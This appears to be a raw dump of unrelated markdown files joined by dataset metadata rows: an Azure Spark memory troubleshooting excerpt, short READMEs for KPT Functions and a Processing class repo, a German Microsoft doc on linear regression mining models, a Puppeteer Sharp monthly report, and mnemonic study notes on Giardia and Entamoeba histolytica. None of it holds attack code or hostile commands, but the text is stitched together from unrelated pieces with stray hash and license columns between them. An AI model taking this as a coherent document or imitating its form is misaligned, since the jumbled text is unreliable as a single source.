spark.yarn.executor.memoryOverhead (Example: 384m for 384 MB)
spark.executor.cores (Example: 2 for 2 cores per executor)
spark.driver.memory (Example: 8g for 8GB)
spark.driver.cores (Example: 4 for 4 cores)
spark.yarn.driver.memoryOverhead (Example: 384m for 384MB)
```
Total memory used by all executors =
```
spark.executor.instances * (spark.executor.memory + spark.yarn.executor.memoryOverhead)
```
Total memory used by driver =
```
spark.driver.memory + spark.yarn.driver.memoryOverhead
```
## Next steps
If you didn't see your problem or are unable to solve your issue, visit one of the following channels for more support:
* [Spark memory management overview](https://spark.apache.org/docs/latest/tuning.html#memory-management-overview).
* [Debugging Spark application on HDInsight clusters](https://blogs.msdn.microsoft.com/azuredatalake/2016/12/19/spark-debugging-101/).
* Get answers from Azure experts through [Azure Community Support](https://azure.microsoft.com/support/community/).
* Connect with [@AzureSupport](https://twitter.com/azuresupport) - the official Microsoft Azure account for improving customer experience by connecting the Azure community to the right resources: answers, support, and experts.
* If you need more help, you can submit a support request from the [Azure portal](https://portal.azure.com/?#blade/Microsoft_Azure_Support/HelpAndSupportBlade/). Select **Support** from the menu bar or open the **Help + support** hub. For more detailed information, please review [How to create an Azure support request](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request). Access to Subscription Management and billing support is included with your Microsoft Azure subscription, and Technical Support is provided through one of the [Azure Support Plans](https://azure.microsoft.com/support/plans/).
| 55.708333 | 638 | 0.787958 | eng_Latn | 0.940711 |
61c887fab982d4e17c218d17b2fb0581c9b1d18c | 95 | md | Markdown | ts/kpt-functions/README.md | dflemstr/kpt-functions-sdk | e7187d05f14c9343d49754c8cce264344271063a | [
"Apache-2.0"
] | 1 | 2020-02-05T20:30:50.000Z | 2020-02-05T20:30:50.000Z | ts/kpt-functions/README.md | dflemstr/kpt-functions-sdk | e7187d05f14c9343d49754c8cce264344271063a | [
"Apache-2.0"
] | null | null | null | ts/kpt-functions/README.md | dflemstr/kpt-functions-sdk | e7187d05f14c9343d49754c8cce264344271063a | [
"Apache-2.0"
] | null | null | null | # KPT Functions SDK
Documentation:
https://googlecontainertools.github.io/kpt-functions-sdk/
| 15.833333 | 57 | 0.8 | yue_Hant | 0.427402 |
61c88c6e4bc34b58bc9ab674c81c050759ecf73b | 146 | md | Markdown | README.md | matthew-e-brown/Grade-12-Processing | f71a8f2672db4e612be6fc3900232202b6c9587f | [
"MIT"
] | null | null | null | README.md | matthew-e-brown/Grade-12-Processing | f71a8f2672db4e612be6fc3900232202b6c9587f | [
"MIT"
] | null | null | null | README.md | matthew-e-brown/Grade-12-Processing | f71a8f2672db4e612be6fc3900232202b6c9587f | [
"MIT"
] | null | null | null | # Grade 12 Processing // Excluding Final Project, BomberDX
This is all of the work I did in ICS-4U1 at Bayside Secondary School using Processing.
| 48.666667 | 86 | 0.787671 | eng_Latn | 0.997128 |
61c8f3d4b5fb9a835b0e297d06edb934c3645230 | 13,316 | md | Markdown | docs/2014/analysis-services/data-mining/mining-model-content-for-linear-regression-models-analysis-services-data-mining.md | SteSinger/sql-docs.de-de | 2259e4fbe807649f6ad0d49b425f1f3fe134025d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/2014/analysis-services/data-mining/mining-model-content-for-linear-regression-models-analysis-services-data-mining.md | SteSinger/sql-docs.de-de | 2259e4fbe807649f6ad0d49b425f1f3fe134025d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/2014/analysis-services/data-mining/mining-model-content-for-linear-regression-models-analysis-services-data-mining.md | SteSinger/sql-docs.de-de | 2259e4fbe807649f6ad0d49b425f1f3fe134025d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Mingingmodellinhalt von linearen Regressionsmodellen (Analysis Services – Datamining) | Microsoft-Dokumentation
ms.custom: ''
ms.date: 06/13/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology: analysis-services
ms.topic: conceptual
helpviewer_keywords:
- linear regression algorithms [Analysis Services]
- mining model content, linear regression models
- regression algorithms [Analysis Services]
ms.assetid: a6abcb75-524e-4e0a-a375-c10475ac0a9d
author: minewiskan
ms.author: owend
manager: craigg
ms.openlocfilehash: 933b56aaa6e364ce55cac8832fc577acc061d510
ms.sourcegitcommit: 3026c22b7fba19059a769ea5f367c4f51efaf286
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 06/15/2019
ms.locfileid: "66083640"
---
# <a name="mining-model-content-for-linear-regression-models-analysis-services---data-mining"></a>Miningmodellinhalt von linearen Regressionsmodellen (Analysis Services – Data Mining)
In diesem Thema wird der Miningmodellinhalt beschrieben, der Modellen eigen ist, die den [!INCLUDE[msCoName](../../includes/msconame-md.md)] Linear Regression-Algorithmus verwenden. Eine Erläuterung der allgemeinen Miningmodellinhalte, die für alle Modelltypen gelten, finden Sie unter [Mining Model Content (Analysis Services - Data Mining)](mining-model-content-analysis-services-data-mining.md).
## <a name="understanding-the-structure-of-a-linear-regression-model"></a>Grundlegendes zur Struktur von linearen Regressionsmodellen
Ein lineares Regressionsmodell verfügt über eine äußerst einfache Struktur. Jedes Modell verfügt über einen einzigen übergeordneten Knoten, die das Modell und seine Metadaten darstellt, und einen regressionsknoten (NODE_TYPE = 25), der die Regressionsformel für jedes vorhersagbare Attribut enthält.

Lineare Regressionsmodelle verwenden den gleichen Algorithmus wie [!INCLUDE[msCoName](../../includes/msconame-md.md)] -Entscheidungsstrukturen. Allerdings kommen andere Parameter für die Einschränkung der Struktur zum Einsatz und es sind nur kontinuierliche Attribute als Eingaben zulässig. Da lineare Regressionsmodelle jedoch auf dem [!INCLUDE[msCoName](../../includes/msconame-md.md)] Decision Trees-Algorithmus basieren, werden lineare Regressionsmodelle mithilfe des [!INCLUDE[msCoName](../../includes/msconame-md.md)] Entscheidungsstruktur-Viewers (Decision Tree Viewer) angezeigt. Informationen finden Sie unter [Durchsuchen eines Modells mit dem Microsoft Struktur-Viewer](browse-a-model-using-the-microsoft-tree-viewer.md).
Der nächste Abschnitt erklärt, wie Informationen im Regressionsformelknoten interpretiert werden. Diese Informationen gelten nicht nur für lineare Regressionsmodelle, sondern auch für Entscheidungsstrukturmodelle, die in einem Teil der Struktur Regressionen enthalten.
## <a name="model-content-for-a-linear-regression-model"></a>Modellinhalt eines linearen Regressionsmodells
In diesem Abschnitt werden nur diejenigen Spalten des Miningmodellinhalts detaillierter und anhand von Beispielen erläutert, die für die lineare Regression relevant sind.
Informationen zu allgemeinen Spalten im Schemarowset finden Sie unter [Mining Model Content (Analysis Services - Data Mining)](mining-model-content-analysis-services-data-mining.md).
MODEL_CATALOG
Name der Datenbank, in der das Modell gespeichert wird.
MODEL_NAME
Name des Modells.
ATTRIBUTE_NAME
**Stammknoten:** Leer
**Regressionsknoten:** Der Name des vorhersagbaren Attributs.
NODE_NAME
Entspricht immer NODE_UNIQUE_NAME.
NODE_UNIQUE_NAME
Ein innerhalb des Modells eindeutiger Bezeichner für den Knoten. Dieser Wert kann nicht geändert werden.
NODE_TYPE
Ein lineares Regressionsmodell gibt die folgenden Knotentypen aus:
|Knotentyp-ID|Typ|Description|
|------------------|----------|-----------------|
|25|Regressionsstrukturstamm|Enthält die Formel, die die Beziehung zwischen der Eingabe- und der Ausgabevariablen beschreibt.|
NODE_CAPTION
Eine Bezeichnung oder Beschriftung, die dem Knoten zugeordnet ist. Diese Eigenschaft dient hauptsächlich zu Anzeigezwecken.
**Stammknoten:** Leer
**Regressionsknoten:** Alle.
CHILDREN_CARDINALITY
Eine Schätzung der Anzahl untergeordneter Elemente des Knotens.
**Stammknoten:** Gibt die Anzahl der regressionsknoten an. Ein Regressionsknoten wird für jedes vorhersagbare Attribut im Modell erstellt.
**Regressionsknoten:** Immer 0.
PARENT_UNIQUE_NAME
Der eindeutige Name des dem Knoten übergeordneten Elements. Für Knoten auf der Stammebene wird NULL zurückgegeben.
NODE_DESCRIPTION
Eine Beschreibung des Knotens.
**Stammknoten:** Leer
**Regressionsknoten:** Alle.
NODE_RULE
Wird für lineare Regressionsmodelle nicht verwendet.
MARGINAL_RULE
Wird für lineare Regressionsmodelle nicht verwendet.
NODE_PROBABILITY
Die diesem Knoten zugeordnete Wahrscheinlichkeit.
**Stammknoten:** 0
**Regressionsknoten:** 1
MARGINAL_PROBABILITY
Die Wahrscheinlichkeit für das Erreichen des Knotens vom übergeordneten Knoten aus.
**Stammknoten:** 0
**Regressionsknoten:** 1
NODE_DISTRIBUTION
Eine geschachtelte Tabelle, die Statistiken über die Werte im Knoten bereitstellt.
**Stammknoten:** 0
**Regressionsknoten:** Eine Tabelle, die mit den Elementen verwendet, um die Regressionsformel zu erstellen. Ein Regressionsknoten enthält die folgenden Werttypen:
|VALUETYPE|
|---------------|
|1 (Missing)|
|3 (Continuous)|
|7 (Koeffizient)|
|8 (Score Gain)|
|9 (Statistik)|
|11 (Intercept)|
NODE_SUPPORT
Die Anzahl der Fälle, die diesen Knoten unterstützen.
**Stammknoten:** 0
**Regressionsknoten:** Die Anzahl der Trainingsfälle.
MSOLAP_MODEL_COLUMN
Name des vorhersagbaren Attributs.
MSOLAP_NODE_SCORE
Entspricht NODE_PROBABILITY
MSOLAP_NODE_SHORT_CAPTION
Eine zu Anzeigezwecken verwendete Beschriftung.
## <a name="remarks"></a>Hinweise
Wenn Sie ein Modell mit dem [!INCLUDE[msCoName](../../includes/msconame-md.md)] Linear Regression-Algorithmus erstellen, generiert die Data Mining-Engine eine besondere Instanz eines Entscheidungsstrukturmodells und liefert Parameter, die die Struktur darauf beschränkt, alle Trainingsdaten in einem einzelnen Knoten zu enthalten. Alle kontinuierlichen Eingaben werden als potenzielle Regressoren gekennzeichnet und als solche bewertet, aber nur diejenigen Regressoren, die den Daten entsprechen, werden als Regressoren in das endgültige Modell übernommen. Die Analyse erzeugt entweder eine einzelne Regressionsformel für jeden Regressor oder keine Regressionsformel.
Sie können die vollständige Regressionsformel unter **Mininglegende**einsehen, indem Sie auf den Knoten **(Alle)** im [Microsoft Struktur-Viewer](browse-a-model-using-the-microsoft-tree-viewer.md)klicken.
Wenn Sie ein Entscheidungsstrukturmodell erstellen, das ein kontinuierliches, vorhersagbares Attribut enthält, verfügt die Struktur zuweilen über Regressionsknoten, die die Eigenschaften von Regressionsstrukturknoten aufweisen.
## <a name="NodeDist_Regression"></a> Knotenverteilung für kontinuierliche Attribute
Die meisten der wichtigen Informationen in einem Regressionsknoten sind in der NODE_DISTRIBUTION-Tabelle enthalten. Im folgenden Beispiel wird das Layout der NODE_DISTRIBUTION-Tabelle veranschaulicht. In diesem Beispiel wurde die Targeted Mailing-Miningstruktur verwendet, um ein lineares Regressionsmodell zu erstellen, das basierend auf dem Alter das Kundeneinkommen vorhersagt. Das Modell dient lediglich Anschauungszwecken, da es mithilfe der bestehenden [!INCLUDE[ssSampleDBnormal](../../includes/sssampledbnormal-md.md)] -Beispieldaten und -Miningstruktur leicht erstellt werden kann.
|ATTRIBUTE_NAME|ATTRIBUTE_VALUE|Alias|PROBABILITY|VARIANCE|VALUETYPE|
|---------------------|----------------------|-------------|-----------------|--------------|---------------|
|Yearly Income|Missing|0|0.000457142857142857|0|1|
|Yearly Income|57220.8876687257|17484|0.999542857142857|1041275619.52776|3|
|Age|471.687717702463|0|0|126.969442359327|7|
|Age|234.680904692439|0|0|0|8|
|Age|45.4269617936399|0|0|126.969442359327|9|
||35793.5477381267|0|0|1012968919.28372|11|
Die NODE_DISTRIBUTION-Tabelle enthält mehrere Zeilen, die jeweils durch eine Variable gruppiert sind. Die ersten zwei Zeilen sind immer die Werttypen 1 und 3 und beschreiben das Zielattribut. Die folgenden Zeilen stellen Details über die Formel für einen besonderen *Regressor*bereit. Ein Regressor ist eine Eingangsvariable, die eine lineare Beziehung mit der Ausgabevariablen hat. Es sind mehrere Regressoren möglich und jeder Regressor verfügt über eine separate Zeile für den Koeffizienten (VALUETYPE = 7), den Ergebnisgewinn (VALUETYPE = 8) und die Statistik (VALUETYPE = 9). Schließlich verfügt die Tabelle über eine Zeile, die das konstante Glied der Gleichung (VALUETYPE = 11) enthält.
### <a name="elements-of-the-regression-formula"></a>Elemente der Regressionsformel
Die geschachtelte NODE_DISTRIBUTION-Tabelle enthält jedes Element der Regressionsformel in einer separaten Zeile. Die ersten beiden Zeilen von Daten in den Beispielergebnissen enthalten Informationen über das vorhersagbare Attribut **Yearly Income**, das die unabhängige Variable modelliert. In der Spalte SUPPORT wird die Anzahl der Fälle gezeigt, die die beiden Status dieses Attributs unterstützen: entweder stand ein Wert **Yearly Income** zur Verfügung oder der Wert **Yearly Income** fehlte.
Die Spalte VARIANCE gibt Aufschluss über die berechnete Varianz des vorhersagbaren Attributs. *Varianz* ist ein Maß dafür, wie zerstreut die Werte in einem Beispiel angesichts einer erwarteten Verteilung sind. Die Varianz wird berechnet, indem der durchschnittliche Wert der quadratischen Abweichung vom Mittelwert genommen wird. Die Quadratwurzel der Varianz wird auch als Standardabweichung bekannt. [!INCLUDE[ssASnoversion](../../includes/ssasnoversion-md.md)] stellt die Standardabweichung nicht bereit; Sie können diese jedoch leicht berechnen.
Für jeden Regressor werden drei Zeilen ausgegeben. Sie enthalten den Koeffizienten, den Ergebnisgewinn und die Regressorstatistik.
Schließlich enthält die Tabelle eine Zeile, die das konstante Glied der Gleichung bereitstellt.
#### <a name="coefficient"></a>Koeffizient
Für jeden Regressor wird ein Koeffizient (VALUETYPE = 7) berechnet. Der Koeffizient selbst erscheint in der Spalte ATTRIBUTE_VALUE, während die Spalte VARIANCE die Varianz für den Koeffizienten angibt. Die Koeffizienten werden berechnet, um Linearität zu maximieren.
#### <a name="score-gain"></a>Ergebnisgewinn
Der Ergebnisgewinn (VALUETYPE = 8) für jeden Regressor stellt den Interessantheitsgrad des Attributs dar. Sie können diesen Wert verwenden, um die Nützlichkeit von mehreren Regressoren einzuschätzen.
#### <a name="statistics"></a>Statistik
Die Regressorstatistik (VALUETYPE = 9) ist der Mittelwert für das Attribut für Fälle, die über einen Wert verfügen. Die Spalte ATTRIBUTE_VALUE enthält den Mittelwert selbst, während die Spalte VARIANCE die Summe der Abweichungen vom Mittelwert enthält.
#### <a name="intercept"></a>Konstantes Glied
In der Regel gibt das *konstante Glied* (VALUETYPE = 11) oder das *Residuum* in einer Regressionsgleichung den Wert des vorhersagbaren Attributs an dem Punkt an, an dem das Eingabeattribut 0 ist. In vielen Fällen geschieht dies nicht und könnte zu nicht intuitiven Ergebnissen führen.
Beispielsweise ist es bei einem Modell, das das Einkommen basierend auf dem Alter vorhersagt, nicht nützlich, das Einkommen bei einem Alter von 0 Jahren anzugeben. In realen Situationen ist es in der Regel nützlicher, das Verhalten in Bezug auf einen Durchschnittswert zu erfahren. Daher ändert [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] [!INCLUDE[ssASnoversion](../../includes/ssasnoversion-md.md)] das kontante Glied so, dass jeder Regressor in Beziehung zum Mittelwert ausgedrückt wird.
Diese Anpassung ist im Miningmodellinhalt schwer ersichtlich. Sie wird erst deutlich, wenn man die vollständige Gleichung in der **Mininglegende** des **Microsoft Struktur-Viewer**einsieht. Die Regressionsformel wird weg vom Punkt 0 zu dem Punkt verlagert, der den Mittelwert darstellt. Dies stellt eine Sicht dar, die angesichts der aktuellen Daten intuitiver ist.
Daher gibt das konstante Glied (VALUETYPE = 11) für die Regressionsformel bei einem Durchschnittsalter von 45 ein durchschnittliches Einkommen an.
## <a name="see-also"></a>Siehe auch
[Miningmodellinhalt (Analysis Services – Data Mining)](mining-model-content-analysis-services-data-mining.md)
[Microsoft Linear Regression-Algorithmus](microsoft-linear-regression-algorithm.md)
[Technische Referenz für den Microsoft Linear Regression-Algorithmus](microsoft-linear-regression-algorithm-technical-reference.md)
[Beispiele für lineare Regressionsmodellabfrage](linear-regression-model-query-examples.md)
| 67.938776 | 735 | 0.782818 | deu_Latn | 0.988365 |
61cac82d23e1d12d4e11460ba870e758641f4488 | 2,750 | md | Markdown | _posts/2019-01-02-puppeteer-sharp-monthly-2019-jan.md | kblok/kblok.github.io | 40288ffaf6c67e4312984e6bfda0b4a393dae67d | [
"MIT"
] | null | null | null | _posts/2019-01-02-puppeteer-sharp-monthly-2019-jan.md | kblok/kblok.github.io | 40288ffaf6c67e4312984e6bfda0b4a393dae67d | [
"MIT"
] | 11 | 2019-01-20T23:11:53.000Z | 2022-02-26T03:37:08.000Z | _posts/2019-01-02-puppeteer-sharp-monthly-2019-jan.md | kblok/kblok.github.io | 40288ffaf6c67e4312984e6bfda0b4a393dae67d | [
"MIT"
] | 2 | 2018-09-07T03:04:50.000Z | 2020-03-19T22:10:51.000Z | ---
title: Puppeteer Sharp Monthly Report - January 2019
tags: puppeteer-sharp csharp
permalink: /blog/puppeteer-sharp-monthly-jan-2019
---
Happy new year Puppeteerers! (Is that even a word?)
We launched [v1.11](https://github.com/hardkoded/puppeteer-sharp/releases/tag/v1.11) during December. The most important feature on v1.11 was _drum rolls_ LINUX SUPPORT!

I want to thank [Dominic Böttger](https://twitter.com/dboettger) who setup our Linux CI and made some tweaks to make Puppeteer-Sharp work in Linux.
We also worked a lot on stability. Out CI builds were failing many times before getting green. So we evaluated every fail and made some improvements. Our builds are working way better than before. That also means that Puppeteer-Sharp is more stable and reliable.
# What's next
I bet Puppeteer v1.12 is around the corner so we will be working on that.
We have more housekeeping to do. I would love to start testing Puppeteer-Sharp on the cloud (e.g. Azure Functions) and also build some Docker images.
# Activity
* Repository Stars: 383 (prev. 340) +12%
* Repository Forks: 67 (prev. 61) +9%
* Nuget downloads: 32278 (prev. 26856) +20%
# Contributors
[Bilal Durrani](https://github.com/bdurrani) pushed a How to reusing a Chrome instance document.
[Stuart Blackler](https://github.com/Im5tu) pushed 2 PRs. Improving even leaks and allocations.
[Meir Blachman](https://www.twitter.com/MeirBlachman) added support to `WaitUntil` in `Page.SetContentAsync`.
As I mentioned before, [Dominic Böttger](https://twitter.com/dboettger) did a great job adding Linux support.
# Final Words
I’m looking forward to getting more feedback. Having real-world feedback helps us a lot. The issues tab in GitHub is open for all of you to share your ideas and thoughts. You can also follow me on Twitter [@hardkoded](https://twitter.com/hardkoded).
Don't stop coding!
#### Previous Reports
* [December 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-dec-2018)
* [November 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-nov-2018)
* [October 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-oct-2018)
* [September 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-sep-2018)
* [July 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-jul-2018)
* [June 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-jun-2018)
* [May 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-may-2018)
* [April 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-april-2018)
* [March 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-march-2018) | 51.886792 | 262 | 0.765455 | eng_Latn | 0.747888 |
61cb66c012e3fe856bcdb6d1ee37028270b783e4 | 9,679 | md | Markdown | articles/logic-apps/logic-apps-scenario-function-sb-trigger.md | eltociear/azure-docs.fr-fr | 3302b8be75f0872cf7d7a5e264850849ac36e493 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/logic-apps/logic-apps-scenario-function-sb-trigger.md | eltociear/azure-docs.fr-fr | 3302b8be75f0872cf7d7a5e264850849ac36e493 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/logic-apps/logic-apps-scenario-function-sb-trigger.md | eltociear/azure-docs.fr-fr | 3302b8be75f0872cf7d7a5e264850849ac36e493 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Appeler des applications logiques avec Azure Functions
description: Créer des fonctions Azure qui appellent ou déclenchent des applications logiques en écoutant Azure Service Bus
services: logic-apps
ms.suite: integration
ms.reviewer: jehollan, klam, logicappspm
ms.topic: article
ms.date: 11/08/2019
ms.openlocfilehash: afd2735bae2a79ad942c347219019ef200b61070
ms.sourcegitcommit: 2ec4b3d0bad7dc0071400c2a2264399e4fe34897
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 03/27/2020
ms.locfileid: "75428703"
---
# <a name="call-or-trigger-logic-apps-by-using-azure-functions-and-azure-service-bus"></a>Appeler ou déclencher des applications logiques à l’aide d’Azure Functions et d’Azure Service Bus
Vous pouvez utiliser [Azure Functions](../azure-functions/functions-overview.md) afin de déclencher une application logique quand vous devez déployer un écouteur ou une tâche de longue durée. Par exemple, vous pouvez créer une fonction Azure qui écoute sur une file d’attente [Azure Service Bus](../service-bus-messaging/service-bus-messaging-overview.md) et qui déclenche immédiatement une application logique en tant que déclencheur d’émission.
## <a name="prerequisites"></a>Prérequis
* Un abonnement Azure. Si vous n’avez pas d’abonnement Azure, [inscrivez-vous pour bénéficier d’un compte Azure gratuit](https://azure.microsoft.com/free/).
* Un espace de noms Azure Service Bus. Si vous n’avez pas d’espace de noms, [créez d’abord votre espace de noms](../service-bus-messaging/service-bus-create-namespace-portal.md).
* Une application de fonction Azure, qui est un conteneur pour les fonctions Azure. Si vous n’avez pas d’application de fonction, [créez d’abord votre application de fonction](../azure-functions/functions-create-first-azure-function.md), puis veillez à sélectionner .NET comme pile d’exécution.
* Des connaissances de base en [création d’applications logiques](../logic-apps/quickstart-create-first-logic-app-workflow.md)
## <a name="create-logic-app"></a>Créer une application logique
Pour ce scénario, vous disposez d’une fonction exécutant chaque application logique que vous voulez déclencher. Créez d’abord une application logique qui démarre avec un déclencheur de requête HTTP. La fonction appelle ce point de terminaison chaque fois qu’un message de la file d’attente est reçu.
1. Connectez-vous au [Portail Azure](https://portal.azure.com) et créez une application logique vide.
Si vous débutez avec les applications logiques, consultez le guide de [Démarrage rapide : Créer votre première application logique](../logic-apps/quickstart-create-first-logic-app-workflow.md).
1. Dans la zone de recherche, entrez `http request`. Dans la liste des déclencheurs, sélectionnez **Lors de la réception d’une requête HTTP**.

Avec le déclencheur Requête, vous pouvez éventuellement entrer un schéma JSON à utiliser avec le message de file d’attente. Les schémas JSON aident le Concepteur d’application logique à comprendre la structure des données d’entrée et facilitent l’utilisation des sorties dans votre workflow.
1. Pour spécifier un schéma, entrez-le dans la zone **Schéma JSON de corps de la demande**, par exemple :

Si vous n’avez pas de schéma, mais un exemple de charge utile au format JSON, vous pouvez générer un schéma à partir de cette charge utile.
1. Dans le déclencheur de requête, sélectionnez **Utiliser l’exemple de charge utile pour générer le schéma**.
1. Sous **Entrer ou coller un exemple de charge utile JSON**, entrez votre exemple de charge utile, puis sélectionnez **Terminé**.

Cet exemple de charge utile génère ce schéma, qui apparaît dans le déclencheur :
```json
{
"type": "object",
"properties": {
"address": {
"type": "object",
"properties": {
"number": {
"type": "integer"
},
"street": {
"type": "string"
},
"city": {
"type": "string"
},
"postalCode": {
"type": "integer"
},
"country": {
"type": "string"
}
}
}
}
}
```
1. Ajoutez les autres actions que vous voulez exécuter après réception du message de file d’attente.
Par exemple, vous pouvez envoyer un e-mail avec le connecteur Office 365 Outlook.
1. Enregistrez votre application logique, ce qui génère l’URL de rappel du déclencheur dans cette application logique. Vous utilisez ensuite cette URL de rappel dans le code pour le déclencheur de file d’attente Azure Service Bus.
L’URL apparaît s’affiche dans la propriété **HTTP POST URL**.

## <a name="create-azure-function"></a>Créer une fonction Azure
Maintenant, créez la fonction qui agit comme déclencheur et écoute la file d’attente.
1. Sur le Portail Azure, ouvrez et développez votre application de fonction, si ce n’est pas déjà le cas.
1. Sous le nom de votre application de fonction, développez **Fonctions**. Dans le volet **Fonctions**, sélectionnez **Nouvelle fonction**.

1. Sélectionnez ce modèle selon que vous avez créé une application de fonction où vous avez sélectionné .NET comme pile d’exécution ou que vous utilisez une application de fonction existante.
* Pour les nouvelles applications de fonction, sélectionnez ce modèle : **Déclencheur File d’attente Service Bus**

* Pour une application de fonction existante, sélectionnez ce modèle : **Déclencheur File d’attente Service Bus - C#**

1. Dans le volet **Déclencheur File d’attente Service Bus**, fournissez un nom pour votre déclencheur, puis configurez la **Connexion Service Bus** pour la file d’attente, qui utilise l’écouteur `OnMessageReceive()` du Kit de développement logiciel (SDK) Azure Service Bus, puis sélectionnez **Créer**.
1. Écrivez une fonction de base pour appeler le point de terminaison d’application logique créé précédemment en utilisant le message de la file d’attente comme déclencheur. Avant d’écrire votre fonction, passez en revue les considérations suivantes :
* Cet exemple utilise un type de contenu de message `application/json`, mais vous pouvez le modifier si nécessaire.
* En raison de la possibilité d’exécution simultanée de fonctions, de volumes élevés ou de charges lourdes, évitez d’instancier la [classe HTTPClient](https://docs.microsoft.com/dotnet/api/system.net.http.httpclient) avec l’instruction `using` et de créer directement des instances HTTPClient par requête. Pour plus d’informations, consultez [Utiliser HttpClientFactory pour implémenter des requêtes HTTP résilientes](https://docs.microsoft.com/dotnet/architecture/microservices/implement-resilient-applications/use-httpclientfactory-to-implement-resilient-http-requests#issues-with-the-original-httpclient-class-available-in-net-core).
* Si possible, réutilisez l’instance de clients HTTP. Pour plus d’informations, consultez la rubrique [Gérer les connexions dans Azure Functions](../azure-functions/manage-connections.md).
Cet exemple utilise la [méthode `Task.Run`](https://docs.microsoft.com/dotnet/api/system.threading.tasks.task.run) en mode [asynchrone](https://docs.microsoft.com/dotnet/csharp/language-reference/keywords/async). Pour plus d’informations, consultez l’article [Programmation asynchrone avec async et await](https://docs.microsoft.com/dotnet/csharp/programming-guide/concepts/async/).
```csharp
using System;
using System.Threading.Tasks;
using System.Net.Http;
using System.Text;
// Can also fetch from App Settings or environment variable
private static string logicAppUri = @"https://prod-05.westus.logic.azure.com:443/workflows/<remaining-callback-URL>";
// Reuse the instance of HTTP clients if possible: https://docs.microsoft.com/azure/azure-functions/manage-connections
private static HttpClient httpClient = new HttpClient();
public static async Task Run(string myQueueItem, TraceWriter log)
{
log.Info($"C# ServiceBus queue trigger function processed message: {myQueueItem}");
var response = await httpClient.PostAsync(logicAppUri, new StringContent(myQueueItem, Encoding.UTF8, "application/json"));
}
```
1. Pour tester la fonction, ajoutez un message de file d’attente à l’aide d’un outil comme [l’Explorateur Service Bus](https://github.com/paolosalvatori/ServiceBusExplorer).
L’application logique se déclenche dès que la fonction reçoit le message.
## <a name="next-steps"></a>Étapes suivantes
* [Appeler, déclencher ou imbriquer des workflows avec des points de terminaison HTTP](../logic-apps/logic-apps-http-endpoint.md)
| 62.850649 | 639 | 0.749148 | fra_Latn | 0.953444 |
61cb90ea29b059d8e33aa7e787d9e2b4769bb40f | 558 | md | Markdown | wdk-ddi-src/content/wudfddi_hwaccess/index.md | AlexGuteniev/windows-driver-docs-ddi | 99b84cea8977c8b190d39e65ccf26f1885ba3189 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-02-07T12:25:19.000Z | 2022-02-07T12:25:19.000Z | wdk-ddi-src/content/wudfddi_hwaccess/index.md | AlexGuteniev/windows-driver-docs-ddi | 99b84cea8977c8b190d39e65ccf26f1885ba3189 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/wudfddi_hwaccess/index.md | AlexGuteniev/windows-driver-docs-ddi | 99b84cea8977c8b190d39e65ccf26f1885ba3189 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-03-02T07:14:24.000Z | 2022-03-02T07:14:24.000Z | ---
description: "Learn more about: Wudfddi_Hwaccess.h header"
UID: NA:wudfddi_hwaccess
title: Wudfddi_Hwaccess.h header
ms.assetid: 980bceb7-c24c-3b37-ba92-d94daf1c0aea
ms.date: 05/09/2018
keywords: ["Wudfddi_Hwaccess.h header"]
ms.keywords:
ms.topic: portal
tech.root: wdf
f1_keywords:
- wudfddi_hwaccess
- wudfddi_hwaccess/wudfddi_hwaccess
api_name:
- wudfddi_hwaccess
---
# Wudfddi_Hwaccess.h header
## -description
This header is used by wdf. For more information, see:
- [Windows Driver Framework](../_wdf/index.md)
| 20.666667 | 59 | 0.732975 | eng_Latn | 0.374661 |
61cbbf8454f64b208373c8cfa2746e1b7323c00f | 26,297 | md | Markdown | notes/10 Parasites.md | kangruixiang/wiki | 7a7c7c7e303aedad31e4b63ab74837697f413b46 | [
"MIT"
] | null | null | null | notes/10 Parasites.md | kangruixiang/wiki | 7a7c7c7e303aedad31e4b63ab74837697f413b46 | [
"MIT"
] | null | null | null | notes/10 Parasites.md | kangruixiang/wiki | 7a7c7c7e303aedad31e4b63ab74837697f413b46 | [
"MIT"
] | null | null | null | ---
date: 2020-09-07
---
# 10 Parasites
## Giardia
<!-- Giardia demographics, transmission, which form -->

- backpack: Associated with campers
- poop in water: Fecal oral transmission
- cysts downstream: Transmitted by cysts
- water bottle: Transmitted through poorly filtered drinking water
<!-- Giardia treatment -->

- metro train: Metronidazole treatment
<!-- Giardia diagnosis -->

- Distinct trophozoite form seen on stool O\&P
- ELISA boat: ELISA may be used for diagnosis


<!-- Giardia symptoms -->

- yellow stool: Causes steatorrhea, or fatty stool (lactose intolerance due to border enzyme deficiency)
## Entameoba Histolytica
<!-- entameoba histolytica 2 forms, transmission, demographics -->

- Do not **ent**er, **his**torical site: **Ent**ameoba **his**tolytica
2 life cycles:
- cyst in water: **Cyst** form
- guy drinking: Cyst form infectious, ingested in contaminated waters
- holding hands: Associated with men who have sex with men. Found to be related to **anal oral** transmission
- Red cups in amoeba: **trophozoites**, invade colon and spread elsewhere
<!-- entamoeba histolytica symptoms -->

- liver map and tomb on right: Right lobe of liver is most common involved site of amoebic liver abscess
- guy with stomach pain: Right upper quadrant pain
- anchovy paste truck: Abscess described as having "anchovy past" consistency
- stains on wall: Intestinal amebiasis: ulcerations in colon
- red stool: Intestinal amebiasis: bloody diarrhea

<!-- entamoeba histolytica diagnosis -->

- O\&P: Diagnosis with stool O\&P
